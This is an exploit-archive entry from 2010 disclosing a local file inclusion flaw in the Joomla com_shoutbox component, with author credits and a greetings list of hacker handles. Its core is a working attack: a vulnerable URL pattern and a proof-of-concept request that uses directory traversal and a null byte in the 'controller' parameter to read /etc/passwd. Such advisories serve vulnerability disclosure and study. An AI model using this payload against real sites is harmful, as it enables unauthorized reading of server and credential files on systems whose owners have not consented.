Joomla Component com_shoutbox LFI Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component com_shoutbox LFI Vulnerability
# Published : 2010-04-05
# Author : Vrs-hCk
# Previous Title : Joomla Component com_svmap v1.1.1 LFI Vulnerability
# Next Title : Joomla Component com_loginbox LFI Vulnerability

================================================================================================

 Title    : Joomla Component com_shoutbox LFI Vulnerability
 Download : http://joomlacode.org/gf/project/shoutbox

 Date     : Monday, 05 April 2010 (Indonesia)
 Author   : Vrs-hCk
 Contact  : ander[at]antisecurity.org
 Blog     : http://c0li.blogspot.com/

 ================================================================================================

 [+] Exploit

     http://[site]/[path]/index.php?option=com_shoutbox&controller=[LFI]

 [+] PoC

     http://localhost/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00

 ================================================================================================

 Greetz   :

     www.MainHack.net - www.ServerIsDown.org - www.AntiSecurity.org
     Paman, NoGe, OoN_Boy, pizzyroot, zxvf, matthews, Genex, s4va, stardustmemory,
     wishnusakti, bl4Ck_3n91n3, H312Y, S3T4N, xr00tb0y, str0ke, dkk.

 ================================================================================================

# c0li.m0de.0n